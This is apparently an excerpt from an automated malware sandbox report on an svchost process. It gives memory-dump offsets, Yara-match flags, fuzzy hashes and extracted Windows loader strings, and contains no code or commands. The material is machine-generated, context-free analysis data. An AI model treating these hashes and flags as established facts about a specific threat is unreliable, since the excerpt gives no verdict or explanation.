                                                          • Instruction Fuzzy Hash: 404189719013504BE731FF65E949B697FA4AB11724F1C821EEC909F2C9CBB84485C7A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@
                                                          • API String ID: 0-149943524
                                                          • Opcode ID: a3e669032be63148fc582e8a5b8326c8c8c066297ac3a3ed1e97b60e7826532c
                                                          • Instruction ID: 1d838454005d71be900683d78218450bf63a32e8a8788f1aa21738fbb595d2ad
                                                          • Opcode Fuzzy Hash: a3e669032be63148fc582e8a5b8326c8c8c066297ac3a3ed1e97b60e7826532c
                                                          • Instruction Fuzzy Hash: 42329B749083118BDB24CF18C680B3EB7E5EF86754F18492EFA969B3A0E734D855CB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: cebbe5c1e45975bd4e18db08795638696fde61b0f6d2d619a94603a1c12eeb5e
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: 27C1CC312043429FDB24CF68C945B6BFBE5AF84318F088A2CFA99CA290D775E505CF95
                                                          Strings
                                                          • ResIdCount less than 2., xrefs: 0368EEC9
                                                          • Failed to retrieve service checksum., xrefs: 0368EE56
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                          • API String ID: 0-863616075
                                                          • Opcode ID: a0820d4578f5789c4653aa918c5491c5950c738628b072fbaee4d135927d10e2
                                                          • Instruction ID: c06d777cc868bbf6faafbc9238541352489e38bbc7d462d7af199cd1c1d58a35
                                                          • Opcode Fuzzy Hash: a0820d4578f5789c4653aa918c5491c5950c738628b072fbaee4d135927d10e2
                                                          • Instruction Fuzzy Hash: C4E1E0B59087849FE324CF15C440BABFBE4FB89314F048A2EE5998B381DB759909CF56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 135728b57ca5e5fc098a8399365d746cd6e9cb104cde1a5250968a6f0c362944
                                                          • Instruction ID: 68e6d25f5e0dc5de08392799fb5897809773a15d80569401355860d50e0182c5
                                                          • Opcode Fuzzy Hash: 135728b57ca5e5fc098a8399365d746cd6e9cb104cde1a5250968a6f0c362944
                                                          • Instruction Fuzzy Hash: 0D614975E00B089FDB24DFA88980AAEBBB9FB44700F14406DE559EB291D732AD01CF54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$$
                                                          • API String ID: 0-233714265
                                                          • Opcode ID: c41bc117ed7162076341a955c59028e4e2cc6c521d759bc0a91d0352d730e7f3
                                                          • Instruction ID: 1060b068f425ea77d3a0190241a6fadc331c18ccc876f4f26073853ce85301e8
                                                          • Opcode Fuzzy Hash: c41bc117ed7162076341a955c59028e4e2cc6c521d759bc0a91d0352d730e7f3
                                                          • Instruction Fuzzy Hash: F361A675E0074ADFDB20EFA4C684BA9BBB5BF48304F18446DE515AF680CB74A941CB94
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0363A2FB
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0363A309
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                                          • Instruction ID: 970e1e6c2eb5572221054081cb045306dc4f79b8e693fbf99f600cbcc0516843
                                                          • Opcode Fuzzy Hash: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                                          • Instruction Fuzzy Hash: 2541B034A04649DBEF15CF99C950BAAB7F8EF46304F2844AADC40DB3A5E335D941CB41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local\$@
                                                          • API String ID: 0-380025441
                                                          • Opcode ID: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                                          • Instruction ID: 1eeef98b9222b5c2e4068286194c2290e8919a001eb6d77d27bba13261c55ff4
                                                          • Opcode Fuzzy Hash: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                                          • Instruction Fuzzy Hash: FC31B37A508344EFC311DF28C980A5BBBE8FBC5694F58092EF59597360EA30DD05CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                                          • Instruction ID: def04f2a4e08c6e44b639ae7ec58c3fd4a0cda41ca06e85e6e39239bf36bdefd
                                                          • Opcode Fuzzy Hash: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                                          • Instruction Fuzzy Hash: 3F824975E002189BDB24CFA9C980BEDFBB5FF4A710F188169E85AAB391D7309D41CB54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: P`vRbv
                                                          • API String ID: 0-2392986850
                                                          • Opcode ID: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                                          • Instruction ID: bdd28e9116e0171cc4b69c70332d2b31decd27e6efcac9248ed54c8a0f30740a
                                                          • Opcode Fuzzy Hash: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                                          • Instruction Fuzzy Hash: 0842F37DD04249AADF29EF68DA546BDFBB0AF0DB10F3C825AD441AB380D7748981CB54
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                                          • Instruction ID: c72d7e21aa660630aab053b34df6614b7166a4c03696f19f6f4eac8964624f97
                                                          • Opcode Fuzzy Hash: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                                          • Instruction Fuzzy Hash: 4DA18FB5608342CFD724DF28C580A2ABBE9FF89314F24496EE5858B351D730E945CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                                          • Instruction ID: 6f20ff28364915122a468ccee0b0b540335eec60431b9d76cfb865f03a52b7c9
                                                          • Opcode Fuzzy Hash: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                                          • Instruction Fuzzy Hash: 6BF19E79608745CFDB21CF24C590B6ABBE5AF88A50F29487DFC8A8B340DB30D945CB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                          • Instruction ID: 2b0b53bb0038222205aa86c5619543855ad2db7ea63b22494501430edee9b119
                                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                          • Instruction Fuzzy Hash: 4A021E76E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PATH
                                                          • API String ID: 0-1036084923
                                                          • Opcode ID: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                                          • Instruction ID: c7f2ed9faacc10fb7b4ac0b0360b3df091f8f0f1326ef43721c1dde4de406b91
                                                          • Opcode Fuzzy Hash: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                                          • Instruction Fuzzy Hash: D0F1D179E00258DBDB25DF98D981ABEBBF1FF4A700F688029E441AB350D7749C41CB65
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ebcb2081de62c829b66ab4be4bd3cd5847ac2407f6ac266c3ee0f3be78840199
                                                          • Instruction ID: bc99c930b40c4da76929bcfbd83a8513674420713844b09f3889f73e16352f97
                                                          • Opcode Fuzzy Hash: ebcb2081de62c829b66ab4be4bd3cd5847ac2407f6ac266c3ee0f3be78840199
                                                          • Instruction Fuzzy Hash: 40414AB4900288AFDB20DFA9D580AADFBF4FB49340F54816ED959EB211D734A950DF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                                          • Instruction ID: 07159e96efa2cd17355f1abeb3b63d93af1dfa92dbd1209198c2ffa6f7f29da9
                                                          • Opcode Fuzzy Hash: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                                          • Instruction Fuzzy Hash: 36A15D35A083686BDF24DB688A41BFEA7B85F4B304F0840DDED876B381C6B5C949CB55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                                          • Instruction ID: e489b179006cfa1e171b88ac69ea38764c3d16dcfa29eb499e8209c49e8c2957
                                                          • Opcode Fuzzy Hash: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                                          • Instruction Fuzzy Hash: E9713975E0061A9FDB28CF9CD6946ADBBB5BF48740F18816EE806AB340D7709D41CF64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                          • Instruction ID: 1cfc58168302b2c59493645412338db0ecc247658966df5d6d3be76a11286db7
                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                          • Instruction Fuzzy Hash: 11617D75D00219ABDF21DF99C944BAEFBF8FF85714F144A6AE810A7290D7B49901CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gfff
                                                          • API String ID: 0-1553575800
                                                          • Opcode ID: a53ee2971cd5daa7af361e8633304357d4f094001abb5bab85bd6721deeafd13
                                                          • Instruction ID: 026f54bcd5b24aa2bf7086a5687438eaeb65bf17d061f235a21a807f0c813b19
                                                          • Opcode Fuzzy Hash: a53ee2971cd5daa7af361e8633304357d4f094001abb5bab85bd6721deeafd13
                                                          • Instruction Fuzzy Hash: E9519B22B0452507E729896DDE443EA7646EBE4314F18827BDCD9EF7D1D4BCAD0243D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gfff
                                                          • API String ID: 0-1553575800
                                                          • Opcode ID: 6768e5af61959c9d6154b7854c7ad6129b87672af39b286f56d23ac66b242486
                                                          • Instruction ID: e41e468f5850d7ac88ebca215e06806b36eaebeac80511617ec36778a62d54b2
                                                          • Opcode Fuzzy Hash: 6768e5af61959c9d6154b7854c7ad6129b87672af39b286f56d23ac66b242486
                                                          • Instruction Fuzzy Hash: 54517B22B0452507E729896DDE543EA6646EBE4314F18827BDCD9EF7C1D4BCAD0243D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                          • Instruction ID: de69738bca26aab09e451f26a3882d74ea14f9395ea660894c422b55e20d1718
                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                          • Instruction Fuzzy Hash: 38517872604305AFD721EF54CD40FAAB7F8FB84B50F04092DBA809B2A0D7B1E954CB95
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: 40cbfe2ce95e8673cf112b824ee7f6a8e634218d0cb58eeb553ddb2322eb5489
                                                          • Instruction ID: 21f83fc0e2911a1b284390625cdc9e58a31a0de520c8bf6e8593683e988d60ba
                                                          • Opcode Fuzzy Hash: 40cbfe2ce95e8673cf112b824ee7f6a8e634218d0cb58eeb553ddb2322eb5489
                                                          • Instruction Fuzzy Hash: 26418076A083019BD710DB75CA84B6BB7E8BF88714F440D2DF985DB280EB75D904C79A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PreferredUILanguages
                                                          • API String ID: 0-1884656846
                                                          • Opcode ID: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                                          • Instruction ID: 41d73c71cceed6cf726749f2e6388583aa4094814e69624f26ebc3b890213ad4
                                                          • Opcode Fuzzy Hash: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                                          • Instruction Fuzzy Hash: 1041E636D05219ABCF11DA94C941BEEF7B9EF44710F05016AE911EB354DAB0DE48CBA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                                          • Instruction ID: 5050e1ac809b3756096bbe2c335ae7b4af01d888695b53cc4544b52ddb942a9e
                                                          • Opcode Fuzzy Hash: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                                          • Instruction Fuzzy Hash: 2E4145B5D0062CABDB21DB54CC84FDEB77CAB45714F4045E9E608EB240DB709E898FA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: verifier.dll
                                                          • API String ID: 0-3265496382
                                                          • Opcode ID: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                                          • Instruction ID: 0d6f0649fefcb7a4e82c02fea64c8bf698d9348f0b97a41022c05c5199b2e6d8
                                                          • Opcode Fuzzy Hash: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                                          • Instruction Fuzzy Hash: 153180B5A403019FDB24DF699950AB6B6F5EB49310F98887EE6099F381E7318C818B94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx
                                                          • API String ID: 0-89312691
                                                          • Opcode ID: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                                          • Instruction ID: 313eca75b1d8bfdd27de6b6c42c0c0b6de4610fd30712caa0cdb8affdd155dea
                                                          • Opcode Fuzzy Hash: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                                          • Instruction Fuzzy Hash: E91160307096028BEB28C91D89546B6F6D9EF97264F3C852AE663CB391D773D8428780
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrCreateEnclave
                                                          • API String ID: 0-3262589265
                                                          • Opcode ID: b8881a723918e667020d8f1ffdba096d8510747cbf572512e2ee96f9e7b465fb
                                                          • Instruction ID: e22d107970d5fcf3c96b5fbb52aaa99cc56316aa6c842f6563b3f6a2b22e29a1
                                                          • Opcode Fuzzy Hash: b8881a723918e667020d8f1ffdba096d8510747cbf572512e2ee96f9e7b465fb
                                                          • Instruction Fuzzy Hash: CF2134B1508344AFD320DF2AC804A9BFBE8EBD6B00F044A1EB5A08B250DBB09545CF96
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                                          • Instruction ID: 4a280fbc98fe7c4eea95c4e384acc1f402609275edffabcb9cca38965550c36a
                                                          • Opcode Fuzzy Hash: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                                          • Instruction Fuzzy Hash: AB822472F102188FCB58CFADD8916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                                          • Instruction ID: d01f84273497d64d6f25ce0e25f88195a1948a6e79f2864fcc216c859a925533
                                                          • Opcode Fuzzy Hash: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                                          • Instruction Fuzzy Hash: 66628F3290464AAFCF24CF08D5904AEFB72BA56314B89C6DCCA9B27704D371BA55CBD1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                                          • Instruction ID: 9504580056d2e77c62b22c7735c85e61f7cb15c7a9476a0c4d3f9918c5fd4746
                                                          • Opcode Fuzzy Hash: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                                          • Instruction Fuzzy Hash: E642C275A006168FDB14DF59C580ABEF7B6FF8C314B28866DD552AB340DB34E842CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                          • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                          • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                          • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e8bedf0ab1c44f63292438cd78a2988a66b23611060334857ab650ba675e3ba
                                                          • Instruction ID: f26811ab4c5d29a51d2666c36dce220d8f4b6b8078d65854eea0a04cdbbb79b6
                                                          • Opcode Fuzzy Hash: 7e8bedf0ab1c44f63292438cd78a2988a66b23611060334857ab650ba675e3ba
                                                          • Instruction Fuzzy Hash: 6C32AC76E01219DBCF24DFA8C994BAEBBB5FF54714F18002AEC05AB381E7759911CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7867509bd86ded83c3a48d884f1cd569b3f69435e101189da1fe0864c125078
                                                          • Instruction ID: dcc844fb335c9e6824dbac76f8bb1893ed432ddc2c2d09be5f156fd08e224e1c
                                                          • Opcode Fuzzy Hash: b7867509bd86ded83c3a48d884f1cd569b3f69435e101189da1fe0864c125078
                                                          • Instruction Fuzzy Hash: 17424975A102599FDB24CF69C981BADF7F5FF88300F18809EE849AB242D7349981CF64
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51fa90f2d6fc7e77e39bfeda8c69bf4a44f2136ea713ffea4c7b08cca53df2cc
                                                          • Instruction ID: 284b4a40b1ba63394f27740b2aec2d0e1fdcd678752c98808c9f87a13c515515
                                                          • Opcode Fuzzy Hash: 51fa90f2d6fc7e77e39bfeda8c69bf4a44f2136ea713ffea4c7b08cca53df2cc
                                                          • Instruction Fuzzy Hash: 3432CD74A007558BEF24CF69CA547BEFBFAAF84314F28855EE4469B384D735A802CB50
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                                          • Instruction ID: 71246390a9ed15d8ad398fd047a3d5282335d68fa9d79f4e3d270904c84e7079
                                                          • Opcode Fuzzy Hash: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                                          • Instruction Fuzzy Hash: CE22DF74A08691CBDB24CFA9C294772B7F1AF44300F0C859AE886CF785E735E562CB64
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
